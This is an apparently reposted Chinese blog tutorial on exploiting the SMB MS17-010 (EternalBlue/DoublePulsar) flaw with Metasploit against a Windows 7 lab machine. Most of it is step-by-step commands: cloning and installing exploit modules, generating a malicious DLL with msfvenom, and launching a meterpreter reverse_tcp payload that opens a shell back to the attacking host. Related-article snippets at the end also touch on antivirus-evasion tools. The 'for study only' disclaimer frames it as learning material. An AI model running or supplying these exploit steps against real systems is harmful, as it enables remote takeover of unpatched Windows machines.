smb(ms17-010)远程命令执行之msf

摘要:
utm_source=qq

1.本次用到的环境:

kali(2016.2)32位系统.ip地址:192.168.1.104

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

具体的步骤如下:

kali系统下安装wine32:

apt-get install wine32 

smb(ms17-010)远程命令执行之msf第1张

用wine32执行cmd.exe

wine cmd.exe

smb(ms17-010)远程命令执行之msf第2张

exit        //退出

smb(ms17-010)远程命令执行之msf第3张

git clone下载其利用脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

smb(ms17-010)远程命令执行之msf第4张

smb(ms17-010)远程命令执行之msf第5张

启动msf,然后进行一系列设置:

service postgresql start
msfconsole

smb(ms17-010)远程命令执行之msf第6张

search  eternalblue
use exploit/windows/smb/eternalblue_doublepulsar

smb(ms17-010)远程命令执行之msf第7张

复制代码
 set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
  set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
setPROCESSINJECT   lsass.exe
setTARGETARCHITECTURE  x64
set rhost  192.168.1.105
show targets
set target 9
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.1.104
exploit
复制代码

smb(ms17-010)远程命令执行之msf第10张

smb(ms17-010)远程命令执行之msf第11张

smb(ms17-010)远程命令执行之msf第12张

smb(ms17-010)远程命令执行之msf第13张

2.附录:

msf下的ms17-010模块:

前提条件:

1. gem install ruby_smb #ruby_smb模块安装

2.msfupdate #msf的更新

3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue" #启动并加载模块

复制代码
root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb
Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploit
Meterpreter> sysinfo
复制代码

smb(ms17-010)远程命令执行之msf第16张

3.搭环境:

kali 192.168.0.10
攻击机win7 192.168.0.4 目标机
kali首先安装wine32
apt-get install wine32 (dpkg --add-architecture i386 && apt-get update && apt-get install wine32)
wine cmd.exe
exitwine cmd.exe
下载exp文件git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
将 eternalblue_doublepulsar.rb 放到 /usr/share/metasploit-framework/modules/exploits/windows/smb/
生成dll
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.10 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll
启动msfconsole 执行reload_all 重新载入模块
use exploit/windows/smb/eternalblue_doublepulsarset rhost 192.168.0.4set payload windows/meterpreter/reverse_tcpset lhost 192.168.0.10set lport 4444
exploit
注: x86系统要执行 set PROCESSINJECT lsass.exe (PROCESSINJECT lsass.exe wlms.exe yes Name of process to inject into (Change to lsass.exe for x64))
参考l
http://www.cnblogs.com/backlion/p/6804863.html
https://zhuanlan.zhihu.com/p/26770020?utm_source=qq

免责声明:文章转载自《smb(ms17-010)远程命令执行之msf》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇PAT Basic 1027 打印沙漏 (20 分)std(标准库)和STL(标准模板库)的关系下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

MSF使用之payload模块

一、exploit和payload exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payload,payload才是真正实现我们攻击的代码(获得shell等等) 以缓冲区溢出为例,exploit模块告诉你在寄存器中要填充多少个字符,让寄存器下一条指令执行的代码位置跳转到我们的payload上 在使用exploit时,我们都是用 use 去...

局域网永恒之蓝病毒发包的解决方案之二

1. 使用shadowbroker 的 eternalblue还有 doublepulsar 实现注入到目标机器的进程, 然后使用kali下的msf 获取到有病毒机器的shell 然后修改密码 查看问题等. 根据网上的教程来进行处理 以及复现等 教程地址: http://blog.csdn.net/claygrit/article/details/7728...

crontab命令

前一天学习了 at 命令是针对仅运行一次的任务,循环运行的例行性计划任务,linux系统则是由 cron (crond) 这个系统服务来控制的。Linux 系统上面原本就有非常多的计划性工作,因此这个系统服务是默认启动的。另外, 由于使用者自己也可以设置计划任务,所以, Linux 系统也提供了使用者控制计划任务的命令 :crontab 命令。 一、cr...

免杀工具汇总

今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC   可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 操作顺序: Sc :是将 msf 生成的 raw...

crontab命令加载和使用

crontab命令用于设置周期性被执行的指令。 在Linux系统中,Linux任务调度的工作主要分为以下两类:1、系统执行的工作:系统周期性所要执行的工作,如备份系统数据、清理缓存2、个人执行的工作:某个用户定期要做的工作,例如每隔10分钟检查邮件服务器是否有新信,这些工作可由每个用户自行设置 首先查看有无安装crontab [root@localhost...

kali中的postgres怎么连接

metasploit,默认使用的是postgresql数据库。在BT5或是Kali等专业的渗透系统中,postgresql已经被默认安装。 执行msfdb init会自动创建一个默认的用户名密码都是msf的postgresql数据库用户,可以用这个来连接。这段说的是在postgresql中建立新库和创建新用户,让msfconsole连接。为的是msfcon...